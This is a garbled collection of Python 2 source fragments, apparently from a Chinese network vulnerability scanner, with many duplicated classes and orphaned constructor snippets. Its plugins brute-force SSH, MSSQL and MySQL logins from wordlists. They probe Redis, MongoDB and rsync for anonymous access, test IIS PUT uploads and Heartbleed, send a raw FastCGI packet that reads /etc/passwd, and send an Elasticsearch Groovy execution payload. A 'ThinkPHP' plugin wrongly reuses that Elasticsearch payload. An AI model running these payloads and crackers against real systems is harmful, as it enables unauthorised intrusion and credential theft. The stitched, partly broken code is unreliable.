def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads=10,
num_of_work=10,
daemon=True)
self.service = 'easgvy'
self.port_list = ['9200']
def __init__(self):
PluginBase.__init__(self)
self.user_dict = 'user.txt'
self.pass_dict = 'password.txt'
self.service = 'mysql'
self.threadpool = ThreadPool(num_of_threads= 5 , num_of_work= 10 , daemon = True)
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads=10,
num_of_work=10,
daemon=True)
self.service = 'rsync'
self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic'
) #chmod 600 rsync.dic
print self.rsync_dic_path
self.port_list = ['873']
class WebIISPutPlugin(PluginBase):
name = "WebIISPutPlugin"
version = '1.0'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads=20,
num_of_work=10,
daemon=True)
def execute_run(self, ip, port, bdomain, taskid):
self.threadpool.add_job(self.__test_iisput, ip, port)
self.async_deal_into_db(bdomain, taskid)
def __test_iisput(self, *args, **kwargs):
'''
验证是否存在iis PUT 漏洞
:param url:
:return:
'''
(ip, port) = args
url = make_url(ip, port)
txt_url = urlparse.urljoin(url, '1.txt')
try:
req = requests.put('%s' % txt_url, data="test!", timeout=2)
if req.status_code == 201: #201 created
return {'url': url, 'status': True}
else:
return {'url': url, 'status': False}
except:
return {'url': url, 'status': False}
def async_deal_into_db(self, bdomain, taskid):
'''
入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
if result_dit['status']:
iis_vulurl = {}
iis_vulurl['sid'] = taskid
iis_vulurl['url'] = result_dit['url']
iis_vulurl['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(IISPUTVUL_TABLE, iis_vulurl)
except:
break
def wait_for_complete(self, bdomain, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(bdomain, taskid)
self.db_close()
class WebIISPutPlugin(PluginBase):
name = "WebIISPutPlugin"
version = '1.0'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 20 , num_of_work= 10 , daemon = True)
def execute_run(self, ip, port, bdomain, taskid):
self.threadpool.add_job(self.__test_iisput, ip, port)
self.async_deal_into_db(bdomain, taskid)
def __test_iisput(self, *args, **kwargs):
'''
验证是否存在iis PUT 漏洞
:param url:
:return:
'''
(ip, port) = args
url = make_url(ip, port)
txt_url = urlparse.urljoin(url, '1.txt')
try:
req = requests.put('%s' % txt_url, data = "test!", timeout=2)
if req.status_code == 201: #201 created
return {'url':url, 'status': True}
else:
return {'url':url, 'status': False}
except:
return {'url':url, 'status': False}
def async_deal_into_db(self, bdomain, taskid):
'''
入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
if result_dit['status']:
iis_vulurl = {}
iis_vulurl['sid'] = taskid
iis_vulurl['url'] = result_dit['url']
iis_vulurl['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(IISPUTVUL_TABLE, iis_vulurl)
except:
break
def wait_for_complete(self, bdomain, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(bdomain, taskid)
self.db_close()
class WebPathScanPlugin(PluginBase):
name = "WebPathScanPlugin"
version = '1.0'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads=10,
num_of_work=10,
daemon=True)
def execute_run(self, ip, port, bdomain, taskid):
if bdomain == DOMAIN_TYPE[0]:
webscan = WebScan(make_url(ip, port), webdomain=True, proxy=False)
elif bdomain == DOMAIN_TYPE[1]:
webscan = WebScan(make_url(ip, port), webdomain=False, proxy=False)
self.threadpool.add_job(webscan.run)
self.async_deal_into_db(bdomain, taskid)
def wait_for_complete(self, bdomain, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(bdomain, taskid)
self.db_close()
def async_deal_into_db(self, bdomain, taskid):
'''
入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get(block=False)
figerinfo = result_dit['figerinfo']
exist_result_list = result_dit['result_list']
for exist_result in exist_result_list:
vulurl = {}
vulurl['sid'] = taskid
vulurl['url'] = exist_result['url']
vulurl['title'] = exist_result['title']
vulurl['keyword'] = ''
vulurl['code'] = exist_result['http_code']
vulurl['figerinfo'] = figerinfo
vulurl['first_time'] = getCurTime()
if bdomain == DOMAIN_TYPE[0]:
#sql = "insert into t_web_vulurl(`sid`, `url`, `title`, `keyword`, `code`, `figerinfo`, `first_time`) values('%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (str(taskid), str(exist_result['url']) , str(exist_result['title']), '', str(exist_result['http_code']), figerinfo, getCurTime())
self.plugin_db.insert_by_dict(WEBVUL_TABLE, vulurl)
elif bdomain == DOMAIN_TYPE[1]:
self.plugin_db.insert_by_dict(WEBIPVUL_TABLE, vulurl)
except Exception, e:
logger.error(str(e))
break
class WebPathScanPlugin(PluginBase):
name = "WebPathScanPlugin"
version = '1.0'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
def execute_run(self, ip, port, bdomain, taskid):
if bdomain == DOMAIN_TYPE[0]:
webscan = WebScan(make_url(ip, port), webdomain=True, proxy=False)
elif bdomain == DOMAIN_TYPE[1]:
webscan = WebScan(make_url(ip, port), webdomain=False, proxy = False)
self.threadpool.add_job(webscan.run)
self.async_deal_into_db(bdomain, taskid)
def wait_for_complete(self, bdomain, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(bdomain, taskid)
self.db_close()
def async_deal_into_db(self, bdomain, taskid):
'''
入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get(block = False)
figerinfo = result_dit['figerinfo']
exist_result_list = result_dit['result_list']
for exist_result in exist_result_list:
vulurl = {}
vulurl['sid'] = taskid
vulurl['url'] = exist_result['url']
vulurl['title'] = exist_result['title']
vulurl['keyword'] = ''
vulurl['code'] = exist_result['http_code']
vulurl['figerinfo'] = figerinfo
vulurl['first_time'] = getCurTime()
if bdomain == DOMAIN_TYPE[0]:
#sql = "insert into t_web_vulurl(`sid`, `url`, `title`, `keyword`, `code`, `figerinfo`, `first_time`) values('%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (str(taskid), str(exist_result['url']) , str(exist_result['title']), '', str(exist_result['http_code']), figerinfo, getCurTime())
self.plugin_db.insert_by_dict(WEBVUL_TABLE , vulurl)
elif bdomain == DOMAIN_TYPE[1]:
self.plugin_db.insert_by_dict(WEBIPVUL_TABLE, vulurl)
except Exception,e:
logger.error(str(e))
break
class MssqlCrackPlugin(PluginBase):
name = "MssqlCrackPlugin"
version = '1.0'
def __init__(self):
PluginBase.__init__(self)
self.user_dict = 'mssqluser.txt'
self.pass_dict = 'password.txt'
self.service = 'mssql'
self.threadpool = ThreadPool(num_of_threads=5,
num_of_work=10,
daemon=True)
self.portlist = ['1433', '1434']
def execute_run(self, ip, port, taskid):
if str(port) in self.portlist:
mssqlcrack = PortCrackBase(self.user_dict, self.pass_dict)
self.threadpool.add_job(mssqlcrack.crack,
ip=ip,
port=port,
service=self.service)
self.async_deal_into_db(taskid)
def async_deal_into_db(self, taskid):
'''
异步入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
portcrack_dic = {}
portcrack_dic['sid'] = taskid
portcrack_dic['host'] = result_dit['ip']
portcrack_dic['port'] = result_dit['port']
portcrack_dic['username'] = result_dit['username']
portcrack_dic['password'] = result_dit['password']
portcrack_dic['service'] = self.service
portcrack_dic['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(PORTCRACK_TABLE, portcrack_dic)
except:
break
def wait_for_complete(self):
PluginBase.wait_for_complete(self)
self.db_close()
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'rsync'
self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic') #chmod 600 rsync.dic
print self.rsync_dic_path
self.port_list = ['873']
class SSHCrackPlugin(PluginBase):
name = "SSHCrackPlugin"
version = '1.0'
def __init__(self):
PluginBase.__init__(self)
self.user_dict = 'sshuser.txt'
self.pass_dict = 'password.txt'
self.service = 'ssh'
self.threadpool = ThreadPool(num_of_threads= 5 , num_of_work= 10 , daemon = True)
def execute_run(self, ip, port, taskid):
if str(port) == '22':
sshcrack = PortCrackBase(self.user_dict, self.pass_dict)
self.threadpool.add_job(sshcrack.crack, ip = ip, port = port, service = self.service)
self.async_deal_into_db(taskid)
def async_deal_into_db(self, taskid):
'''
异步入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
portcrack_dic = {}
portcrack_dic['sid'] = taskid
portcrack_dic['host'] = result_dit['ip']
portcrack_dic['port'] = result_dit['port']
portcrack_dic['username'] = result_dit['username']
portcrack_dic['password'] = result_dit['password']
portcrack_dic['service'] = self.service
portcrack_dic['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(PORTCRACK_TABLE, portcrack_dic)
except:
break
def wait_for_complete(self, taskid):
PluginBase.wait_for_complete(self)
self.db_close()
class MongodbUnauthPlugin(PluginBase):
name = "MongodbUnauthPlugin"
version = '1.0'
description = 'mongodb匿名访问'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'mongodb'
self.port_list = ['27017', '28017']
def execute_run(self, ip, port, taskid):
if str(port) in self.port_list:
logger.info('[Mongodb] ip:%s, port:%s' % (str(ip), str(port)))
self.threadpool.add_job(self.__test_mongodbunauth, ip, port)
self.async_deal_into_db(taskid)
def __test_mongodbunauth(self, *args, **kwargs):
'''
验证是否存在mongodb未授权访问漏洞
:param url:
:return:
'''
(ip, port) = args[0]
bunauth = False
try:
connection = pymongo.MongoClient(ip, port, socketTimeoutMS=3000)
dbname = connection.database_names()
connection.close()
#101.227.21.94:27017/[u'Log', u'db', u'config', u'admin']
#logger.info(ip + ":" + str(port) + '/' + str(dbname))
bunauth = True
except Exception,e:
pass
return {'ip' : ip, 'status' : bunauth, 'port' : str(port)}
class RedisUnauthPlugin(PluginBase):
name = "RedisUnauthPlugin"
version = '1.0'
description = 'redis匿名访问'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'redis'
self.port_list = ['6379']
def execute_run(self, ip, port, taskid):
if str(port) in self.port_list:
logger.info('[redis] ip:%s, port:%s' % (str(ip), str(port)))
self.threadpool.add_job(self.__test_redisunauth, ip, port)
self.async_deal_into_db(taskid)
def __test_redisunauth(self, *args, **kwargs):
'''
验证是否存在redis未授权访问漏洞
:param url:
:return:
'''
(ip, port) = args[0]
bunauth = False
try:
r = redis.StrictRedis(host=ip, port = int(port), db=0, socket_timeout = 2, socket_connect_timeout = 1)
r.lpush('foo', 'bar')
if r.rpop('foo') == 'bar':
bunauth = True
except Exception,e:
pass
return {'ip' : ip, 'port' : port, 'status' : bunauth}
def run(self):
self.threadpool = ThreadPool(num_of_threads= self.threadpool_count , num_of_work= 0 , daemon = False, timeout = 30)
while self.cip_que.qsize() > 0:
cip_dic = self.cip_que.get_nowait()
self.taskid = cip_dic['taskid']
#判断是否是内网IP
if not test_private_ip(cip_dic['ip']):
logger.info('current scan ip %s' % cip_dic['ip'])
nmap = NmapScan(ip = cip_dic['ip'], threads_num = 30)
self.threadpool.add_job(nmap.run)
else:
logger.info('skip private ip:%s!' % cip_dic['ip'])
time.sleep(0.5)
if self.threadpool is not None:
self.threadpool.wait_for_complete() #等待线程结束
self.insert_db()
self.threadpool = None
logger.info('port scan over!')
self.vulplugin_dispatch() #开启扫描插件
logger.info('plugin start running......')
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'thinkphp'
class FastcgiPlugin(PluginBase):
name = "FastcgiPlugin"
version = '1.0'
description = 'fastcgi remote exec'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads=10,
num_of_work=10,
daemon=True)
self.service = 'fastcgi'
self.port_list = ['9000']
def execute_run(self, ip, port, taskid):
if str(port) in self.port_list:
logger.info('[fastcgi] ip:%s, port:%s' % (str(ip), str(port)))
self.threadpool.add_job(self.__test_fastcgi, ip, port)
self.async_deal_into_db(taskid)
def __test_fastcgi(self, *args, **kwargs):
'''
:param url:
:return:
'''
bvulnerable = False
(ip, port) = args[0]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5.0)
sock.connect((ip, int(port)))
data = """
01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
"""
data_s = ''
for _ in data.split():
data_s += chr(int(_, 16))
sock.send(data_s)
try:
ret = sock.recv(1024)
print ret
if ret.find(':root:') > 0:
bvulnerable = True
else:
bvulnerable = False
except:
pass
sock.close()
return {'ip': ip, 'port': port, 'status': bvulnerable}
def async_deal_into_db(self, taskid):
'''
异步入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
if result_dit['status']:
sysvul_dic = {}
sysvul_dic['sid'] = taskid
sysvul_dic['ip'] = result_dit['ip']
sysvul_dic['port'] = result_dit['port']
sysvul_dic['service'] = self.service
sysvul_dic['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
except:
break
def wait_for_complete(self, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(taskid)
self.db_close()
def __init__(self): PluginBase.__init__(self) self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True) self.service = 'openssl' self.port_list = ['443', '8443', '9443']
class FastcgiPlugin(PluginBase):
name = "FastcgiPlugin"
version = '1.0'
description = 'fastcgi remote exec'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'fastcgi'
self.port_list = ['9000']
def execute_run(self, ip, port, taskid):
if str(port) in self.port_list:
logger.info('[fastcgi] ip:%s, port:%s' % (str(ip), str(port)))
self.threadpool.add_job(self.__test_fastcgi, ip, port)
self.async_deal_into_db(taskid)
def __test_fastcgi(self, *args, **kwargs):
'''
:param url:
:return:
'''
bvulnerable = False
(ip, port) = args[0]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
sock.connect((ip, int(port)))
data = """
01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
"""
data_s = ''
for _ in data.split():
data_s += chr(int(_,16))
sock.send(data_s)
try:
ret = sock.recv(1024)
print ret
if ret.find(':root:') > 0:
bvulnerable = True
else:
bvulnerable = False
except:
pass
sock.close()
return {'ip':ip, 'port': port, 'status':bvulnerable}
def async_deal_into_db(self, taskid):
'''
异步入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
if result_dit['status']:
sysvul_dic = {}
sysvul_dic['sid'] = taskid
sysvul_dic['ip'] = result_dit['ip']
sysvul_dic['port'] = result_dit['port']
sysvul_dic['service'] = self.service
sysvul_dic['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
except:
break
def wait_for_complete(self, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(taskid)
self.db_close()
class RsyncUnauthPlugin(PluginBase):
name = "RsyncUnauthPlugin"
version = '1.0'
description = 'rsync匿名访问'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads=10,
num_of_work=10,
daemon=True)
self.service = 'rsync'
self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic'
) #chmod 600 rsync.dic
print self.rsync_dic_path
self.port_list = ['873']
def execute_run(self, ip, port, taskid):
if str(port) in self.port_list:
logger.info('[rsync] ip:%s, port:%s' % (str(ip), str(port)))
self.threadpool.add_job(self.run, ip, port)
self.async_deal_into_db(taskid)
def run(self, *args, **kwargs):
global UNAUTH
UNAUTH = False
(ip, port) = args[0]
if self.__test_rsyncunauth(ip):
return {'ip': ip, 'port': port, 'status': True}
else:
return {'ip': ip, 'port': port, 'status': False}
def __test_rsyncunauth(self, ip, data=' '):
'''
验证是否存在rsync未授权访问漏洞
:param url:
:return:
'''
global UNAUTH
cmd = 'rsync -v --password-file=' + self.rsync_dic_path + '--timeout=5 ' + ip + '::' + data
print cmd
(status,
resp) = commands.getstatusoutput('rsync -v --password-file=' +
self.rsync_dic_path +
' --timeout=5 ' + ip + '::' + data)
if status == 0: #表示获取# 到敏感信息
if resp == '':
return UNAUTH
resp_dic = resp.split(' \t\n')
for item in resp_dic:
re_result = re.search(
r'[dwrx-]{10}\s+[\d]+\s+[\d]{4}\/[\d]{1,2}\/[\d]{1,2}\s+[0-5]\d:[0-5]\d:[0-5]\d\s+(.*)',
item)
if re_result is not None:
UNAUTH = True
break
if item != ' ':
self.__test_rsyncunauth(ip, item[:item.find(' ')])
return UNAUTH
else:
return UNAUTH
def async_deal_into_db(self, taskid):
'''
异步入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
if result_dit['status']:
sysvul_dic = {}
sysvul_dic['sid'] = taskid
sysvul_dic['ip'] = result_dit['ip']
sysvul_dic['port'] = result_dit['port']
sysvul_dic['service'] = self.service
sysvul_dic['first_time'] = getCurTime()
print sysvul_dic['ip'] + " success!!!"
#self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
except:
break
def wait_for_complete(self, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(taskid)
self.db_close()
class OpensslPlugin(PluginBase):
name = "OpensslPlugin"
version = '1.0'
description = 'openssl heartbleed'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'openssl'
self.port_list = ['443', '8443', '9443']
def execute_run(self, ip, port, taskid):
if str(port) in self.port_list:
logger.info('[Openssl] ip:%s, port:%s' % (str(ip), str(port)))
self.threadpool.add_job(self.__test_heartbleed, ip, port)
self.async_deal_into_db(taskid)
def __test_heartbleed(self, *args, **kwargs):
'''
:param args:
:param kwargs:
:return:
'''
(ip, port) = args[0]
bvulnerable = False
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send(hello)
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
s.close()
if typ == 22 and ord(pay[0]) == 0x0E:
break
s.send(hb)
if hit_hb(s):
bvulnerable = True
s.close()
except:
pass
return {'ip':ip, 'port': port, 'status':bvulnerable}
def async_deal_into_db(self, taskid):
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
if result_dit['status']:
sysvul_dic = {}
sysvul_dic['sid'] = taskid
sysvul_dic['ip'] = result_dit['ip']
sysvul_dic['port'] = result_dit['port']
sysvul_dic['service'] = self.service
sysvul_dic['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
except:
break
def wait_for_complete(self, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(taskid)
self.db_close()
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads=10,
num_of_work=10,
daemon=True)
class EasGvyRemotePlugin(PluginBase):
name = "EasGvyRemotePlugin"
version = '1.0'
description = 'eas grovy命令执行'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads=10,
num_of_work=10,
daemon=True)
self.service = 'easgvy'
self.port_list = ['9200']
def execute_run(self, ip, port, taskid):
if str(port) in self.port_list:
self.threadpool.add_job(self.__test_easgvy, ip, port)
self.async_deal_into_db(taskid)
def __test_easgvy(self, *args, **kwargs):
'''
:param url:
:return:
'''
(ip, port) = args[0]
self.url = 'http://%s:%s/_search' % (ip, str(port))
payload = {
"size": 1,
"script_fields": {
"POC": {
"script":
"java.lang.Math.class.forName(\"java.lang.Runtime\")",
"lang": "groovy"
}
}
}
try:
req = urllib2.Request(self.url,
headers=HTTP_HEADERS,
data=json.dumps(payload))
resp = urllib2.urlopen(req, timeout=3)
json_content = json.loads(resp.read())
if json_content['hits']['hits'][0]['fields']['POC'][
0] == 'class java.lang.Runtime':
return {'ip': ip, 'port': port, 'status': True}
else:
return {'ip': ip, 'port': port, 'status': False}
except:
return {'ip': ip, 'port': port, 'status': False}
def async_deal_into_db(self, taskid):
'''
异步入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
print result_dit
if result_dit['status']:
sysvul_dic = {}
sysvul_dic['sid'] = taskid
sysvul_dic['ip'] = result_dit['ip']
sysvul_dic['port'] = result_dit['port']
sysvul_dic['service'] = self.service
sysvul_dic['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(WEBAPP_KEY, sysvul_dic)
except:
break
def wait_for_complete(self, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(taskid)
self.db_close()
class TpRemotePlugin(PluginBase):
name = "TpRemotePlugin"
version = '1.0'
description = 'thinkphp 代码执行'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'thinkphp'
def execute_run(self, ip, port, taskid):
self.threadpool.add_job(self.__test_tpexec, ip, port)
self.async_deal_into_db(taskid)
def __test_tpexec(self, *args, **kwargs):
'''
:param url:
:return:
'''
(ip, port) = args[0]
self.url = 'http://%s:%s/index.php' % (ip, str(port))
payload = {"size": 1,"script_fields": {"POC": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\")","lang": "groovy"}}}
try:
req = urllib2.Request(self.url, headers= HTTP_HEADERS, data = json.dumps(payload))
resp = urllib2.urlopen(req, timeout = 3)
json_content = json.loads(resp.read())
if json_content['hits']['hits'][0]['fields']['POC'][0] == 'class java.lang.Runtime':
return {'ip' : ip, 'port' : port, 'status' : True}
else:
return {'ip' : ip, 'port' : port, 'status' : False}
except:
return {'ip' : ip, 'port' : port, 'status' : False}
def async_deal_into_db(self, taskid):
'''
异步入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
print result_dit
if result_dit['status']:
sysvul_dic = {}
sysvul_dic['sid'] = taskid
sysvul_dic['ip'] = result_dit['ip']
sysvul_dic['port'] = result_dit['port']
sysvul_dic['service'] = self.service
sysvul_dic['first_time'] = getCurTime()
self.plugin_db.insert_by_dict(WEBAPP_KEY, sysvul_dic)
except:
break
def wait_for_complete(self, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(taskid)
self.db_close()
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'mongodb'
self.port_list = ['27017', '28017']
class PortScanPluginController():
'''
端口扫描控制器
'''
def __init__(self, rediswork = None):
self.cip_que = Queue.Queue(0)
self.threadpool = None
self.threadpool_count = 5 #线程池数
self.ps_db = PortScanDB().db
self.rediswork = rediswork
self.taskid = 0
def push_ip(self, ip, taskid):
self.cip_que.put_nowait({'ip':ip,'taskid':taskid})
def get_ip_cnt(self):
return self.cip_que.qsize()
def run(self):
self.threadpool = ThreadPool(num_of_threads= self.threadpool_count , num_of_work= 0 , daemon = False, timeout = 30)
while self.cip_que.qsize() > 0:
cip_dic = self.cip_que.get_nowait()
self.taskid = cip_dic['taskid']
#判断是否是内网IP
if not test_private_ip(cip_dic['ip']):
logger.info('current scan ip %s' % cip_dic['ip'])
nmap = NmapScan(ip = cip_dic['ip'], threads_num = 30)
self.threadpool.add_job(nmap.run)
else:
logger.info('skip private ip:%s!' % cip_dic['ip'])
time.sleep(0.5)
if self.threadpool is not None:
self.threadpool.wait_for_complete() #等待线程结束
self.insert_db()
self.threadpool = None
logger.info('port scan over!')
self.vulplugin_dispatch() #开启扫描插件
logger.info('plugin start running......')
def insert_db(self):
'''
结果导入数据库
'''
while self.threadpool.resultQueue.qsize() > 0:
result = self.threadpool.resultQueue.get_nowait()
for item in result:
for port, service in item['scan_result'].iteritems():
if service is None or service == '':
service = 'unknown'
domainPortDic = {}
domainPortDic['sid'] = self.taskid
domainPortDic['ip'] = item['ip']
domainPortDic['port'] = port
domainPortDic['service'] = service
domainPortDic['first_time'] = getCurTime()
self.ps_db.insert_by_dict(DOMAIN_PORT_TABLE, domainPortDic)
#存入redis 队列
self.portScanDispatch(item['ip'], port)
def portScanDispatch(self, ip, port):
'''
端口任务调度
'''
#判断当前端口是否存在Web访问
if port not in NOWEB_PORT:
if test_webservice(ip, port):
self.rediswork.pushvulInfo(keyname = WEBSCAN_KEY, ip = ip, port = port, taskid = self.taskid, type = DOMAIN_TYPE[1])
#bug修改 -----这里不能用elif啊 每个流程都需要走完才行
if CRACK_PORT.has_key(int(port)):
self.rediswork.pushvulInfo(keyname = PORTCRACK_KEY, ip = ip, port = port, taskid = self.taskid)
if SYSVUL_PORT.has_key(int(port)):
self.rediswork.pushvulInfo(keyname = SYSVUL_KEY, ip = ip, port = port, taskid = self.taskid)
def vulplugin_dispatch(self):
webpathscan_dispath()
portcrack_dispath()
systemvul_dispath()
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'fastcgi'
self.port_list = ['9000']
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'redis'
self.port_list = ['6379']
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 20 , num_of_work= 10 , daemon = True)
class RsyncUnauthPlugin(PluginBase):
name = "RsyncUnauthPlugin"
version = '1.0'
description = 'rsync匿名访问'
def __init__(self):
PluginBase.__init__(self)
self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
self.service = 'rsync'
self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic') #chmod 600 rsync.dic
print self.rsync_dic_path
self.port_list = ['873']
def execute_run(self, ip, port, taskid):
if str(port) in self.port_list:
logger.info('[rsync] ip:%s, port:%s' % (str(ip), str(port)))
self.threadpool.add_job(self.run, ip, port)
self.async_deal_into_db(taskid)
def run(self, *args, **kwargs):
global UNAUTH
UNAUTH = False
(ip, port) = args[0]
if self.__test_rsyncunauth(ip):
return {'ip':ip, 'port': port , 'status': True}
else:
return {'ip':ip, 'port': port , 'status': False}
def __test_rsyncunauth(self, ip, data = ' '):
'''
验证是否存在rsync未授权访问漏洞
:param url:
:return:
'''
global UNAUTH
cmd = 'rsync -v --password-file=' + self.rsync_dic_path + '--timeout=5 ' + ip + '::' + data
print cmd
(status, resp) = commands.getstatusoutput('rsync -v --password-file=' + self.rsync_dic_path + ' --timeout=5 ' + ip + '::' + data)
if status == 0: #表示获取# 到敏感信息
if resp == '':
return UNAUTH
resp_dic = resp.split(' \t\n')
for item in resp_dic:
re_result = re.search(r'[dwrx-]{10}\s+[\d]+\s+[\d]{4}\/[\d]{1,2}\/[\d]{1,2}\s+[0-5]\d:[0-5]\d:[0-5]\d\s+(.*)', item)
if re_result is not None:
UNAUTH = True
break
if item != ' ':
self.__test_rsyncunauth(ip, item[:item.find(' ')])
return UNAUTH
else:
return UNAUTH
def async_deal_into_db(self, taskid):
'''
异步入库
:return:
'''
while not self.threadpool.resultQueue.empty():
try:
result_dit = self.threadpool.resultQueue.get_nowait()
if result_dit['status']:
sysvul_dic = {}
sysvul_dic['sid'] = taskid
sysvul_dic['ip'] = result_dit['ip']
sysvul_dic['port'] = result_dit['port']
sysvul_dic['service'] = self.service
sysvul_dic['first_time'] = getCurTime()
print sysvul_dic['ip'] + " success!!!"
#self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
except:
break
def wait_for_complete(self, taskid):
#PluginBase.wait_for_complete(self)
self.async_deal_into_db(taskid)
self.db_close()
